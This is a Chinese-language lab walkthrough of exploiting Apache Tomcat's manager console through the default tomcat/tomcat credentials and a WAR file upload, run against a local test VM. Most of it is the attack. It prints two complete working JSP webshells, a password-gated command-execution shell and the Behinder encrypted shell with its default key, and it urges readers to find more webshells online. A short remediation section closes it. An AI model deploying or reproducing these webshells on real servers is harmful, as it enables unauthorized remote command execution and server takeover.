Tomcat 弱口令及文件上传漏洞复现

0x01 漏洞介绍

1. 漏洞描述
   tomcat存在管理后台进行应用部署管理，且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令，攻击者容易进行暴力破解登录后台并进行应用管理。登录成功后有上传点，上传压缩包 xxx.war的.war不会被解析，直接访问 xxx/目录下的木马，拿到权限
2. 受影响版本
   Tomcat版本：7.0–>8.0

0x02 环境部署：

搭建一次，复现百次
靶机 ip：192.168.30.209
kali ip：192.168.30.182

开启靶场环境

0x03 漏洞复现

1. 弱口令登录

从网上进行搜索tomcat原始登录名与密码都是tomcat，从github下载tomcat 8的源码，我们可以查看到tomcat的默认登录名为tomcat，并且密码也为tomcat
tomcat 8.0.x 源码

进行查看登录的用户名及密码

2. 点击Server Status进行登录

弱口令tomcat tomcat 直接登录成功

3. 发现文件上传点

上传的文件格式必须为war

4. 上传木马文件

4.1 将三个木马放进exec文件夹

4.2 将exec文件夹进行压缩为zip格式，手动将后缀zip修改为war

4.3 上传exec.war文件

上传成功

5. 方法一：执行命令

//这是jsp命令执行脚本，带回显
<%
if("666".equals(request.getParameter("pass"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>

访问的时候注意参数pass的值为666，参数cmd后跟要执行的命令

6. 方法二：冰蝎连接

这里的链接密码为 rebeyond

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

连接成功

7. 方法三：打开jsp大马

我这里可能环境问题，也有可能jsp大马的问题，导致没能成功，你们可以在网上自行查找jsp大马，然后上传打开，学会方法最重要

0x04 漏洞修复

1. 不要将弱口令作为自己登陆的账号和密码，无论搭建完什么服务，都要记得将用户名和密码进行修改
2. 新tomcat版本并检查配置文件